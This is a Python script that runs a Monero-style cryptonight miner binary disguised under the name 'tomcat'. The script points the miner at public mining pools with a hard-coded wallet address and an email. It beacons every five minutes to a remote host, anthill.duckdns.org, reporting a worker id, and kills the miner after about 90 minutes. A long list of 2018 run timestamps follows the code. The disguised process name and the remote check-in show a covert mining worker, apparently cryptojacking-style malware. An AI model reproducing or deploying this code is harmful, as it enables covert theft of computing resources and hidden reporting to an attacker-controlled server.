import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:02.124687
#2018-02-17 16:15:05.960897
#2018-02-17 18:03:07.665772
#2018-02-17 19:52:01.941209
#2018-02-17 21:41:02.003678
#2018-02-17 23:25:08.362473
#2018-02-18 01:14:05.146289
#2018-02-18 03:02:05.291139
#2018-02-18 04:49:06.724352
#2018-02-18 06:40:05.224181
#2018-02-18 08:29:05.475191
#2018-02-18 10:16:04.636527
#2018-02-18 12:02:02.008246
#2018-02-18 13:46:07.556105
#2018-02-18 15:37:05.224100
#2018-02-18 17:26:04.240993
#2018-02-18 19:14:07.047901
#2018-02-18 21:01:04.125043
#2018-02-18 22:47:05.611586
#2018-02-19 00:36:06.404368
#2018-02-19 02:22:03.766807
#2018-02-19 04:09:01.709192
#2018-02-19 05:53:01.545710
#2018-02-19 07:41:01.486210
#2018-02-19 09:30:03.864311
#2018-02-19 11:19:01.798413
#2018-02-19 13:06:02.058865
#2018-02-19 14:54:06.962422
#2018-02-19 16:43:07.774988
#2018-02-19 18:29:05.226334
#2018-02-19 20:17:01.283291
#2018-02-19 22:06:05.875344
#2018-02-19 23:53:05.330431
#2018-02-20 01:40:06.543384
#2018-02-20 03:28:04.062905
#2018-02-20 05:15:08.015655
#2018-02-20 06:59:05.745209
#2018-02-20 08:46:01.503384
#2018-02-20 10:30:08.055543
#2018-02-20 12:15:09.193659
#2018-02-20 14:04:09.680477
#2018-02-20 15:48:02.105200
#2018-02-20 17:35:08.186983
#2018-02-20 19:24:01.521237
#2018-02-20 21:12:01.902382
#2018-02-20 22:56:04.836417
#2018-02-21 00:41:06.593682
#2018-02-21 02:27:05.974178
#2018-02-21 04:14:05.829437
#2018-02-21 06:02:11.560200
#2018-02-21 07:50:01.365133
#2018-02-21 09:34:07.973505
#2018-02-21 11:22:04.031892
#2018-02-21 13:09:01.823855
#2018-02-21 14:55:06.864343
#2018-02-21 16:45:15.077276
#2018-02-21 18:35:02.030406
#2018-02-21 20:20:10.435553
#2018-02-21 22:08:05.825191
#2018-02-21 23:56:01.950251
#2018-02-22 01:44:06.318977
#2018-02-22 03:31:02.208640
#2018-02-22 05:18:01.836171
#2018-02-22 07:03:01.323839
#2018-02-22 08:48:07.952511
#2018-02-22 10:35:07.078522
#2018-02-22 12:22:08.834693
#2018-02-22 14:07:07.059319
#2018-02-22 15:54:09.582758
#2018-02-22 17:41:07.439993
#2018-02-22 19:29:04.776987
#2018-02-22 21:21:05.786758
#2018-02-22 23:07:06.587566
#2018-02-23 00:54:06.154275
#2018-02-23 02:44:02.174013
#2018-02-23 04:32:06.838624
#2018-02-23 06:18:08.303640
#2018-02-23 08:05:03.841699
#2018-02-23 10:19:01.756981
#2018-02-23 12:11:01.929028
#2018-02-23 13:58:02.137160
#2018-02-23 15:49:04.658614
#2018-02-23 17:35:08.383679
#2018-02-23 19:22:06.332744
#2018-02-23 21:06:02.200003
#2018-02-23 22:51:01.345539
#2018-02-24 00:42:08.015821
#2018-02-24 02:33:06.657464
#2018-02-24 04:26:06.537990
#2018-02-24 06:12:01.656725
#2018-02-24 07:59:05.453065
#2018-02-24 09:44:05.379104
#2018-02-24 11:41:01.424302
#2018-02-24 13:32:04.156300
#2018-02-24 15:20:05.450450
#2018-02-24 17:09:05.203389
#2018-02-24 19:00:08.621668
#2018-02-24 20:48:05.594314
#2018-02-24 23:06:01.532151
#2018-02-25 03:13:06.363053
#2018-02-25 06:48:07.855593